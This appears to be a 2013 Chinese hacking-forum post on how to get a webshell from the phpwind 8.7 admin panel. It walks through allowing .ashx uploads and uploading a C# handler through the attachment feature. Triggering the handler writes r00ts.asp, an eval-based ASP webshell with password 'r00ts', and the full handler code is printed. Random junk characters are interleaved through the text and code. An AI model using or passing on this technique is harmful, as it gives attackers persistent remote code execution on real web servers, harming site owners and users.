找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2220|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
, q% X$ w6 |0 o$ A/ \3 L' J/ D " {9 {8 s/ H  o
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx2 W) m& K) g1 p
( u1 ~& F6 q3 g1 M4 ]
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
- }0 B& N8 S8 @3 s8 D; g4 E. l - R) w- R* j9 ?4 Z# g
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx, H: x% U: y1 J2 x3 @1 C' z& i; G

. b7 h/ f9 S' {打开之后空白 会在目录底下生成r00ts.asp 密码r00ts3 F7 \. @- d' v+ |5 u+ S

2 @, C" L  O  B5 X+ i: z下面是代码:
( @6 I/ V3 n, K 9 _( g# O+ k6 ?* T& B
<%@ WebHandler Language="C#"Class="Handler" %>
2 U7 ]' [9 E  p! [! c0 vusing System;9 `9 x) X# i7 b1 L& J8 F. Y7 H+ n$ X
using System.Web;
2 ^# S# J7 m* L+ A' wusing System.IO;, ^  d1 h0 K8 |  ~
public class Handler : IHttpHandler {
1 W4 p0 W: b) y  H. X8 g* ]public void ProcessRequest (HttpContext context) {
/ S9 r6 s# `& N7 L# qcontext.Response.ContentType = "text/plain";) Y7 z0 g! W8 e  U0 h4 E3 ]$ e5 v
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));7 j9 x  H( @4 I. G
file1.Write("<%eval request(\"r00ts\")%>");% |/ t) Y, [$ \4 u* P: T  a' v. k
file1.Flush();
9 y, D7 b2 d/ D% I. @file1.Close();2 ]! K% B8 k0 q- J
}
  c7 i+ M  v8 \% v& A: K" cpublic bool IsReusable {
9 C+ u3 l* o& Z2 W3 z* lget {
9 a% e( Q) E' w3 {return false;
0 o  M$ h+ D$ P2 {" J}
) N5 ?' C# q. G7 u* z: K6 E' H}" r/ b3 ?) g% V4 t, S1 J
}
! M0 a/ p/ A+ p, a$ ]" \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表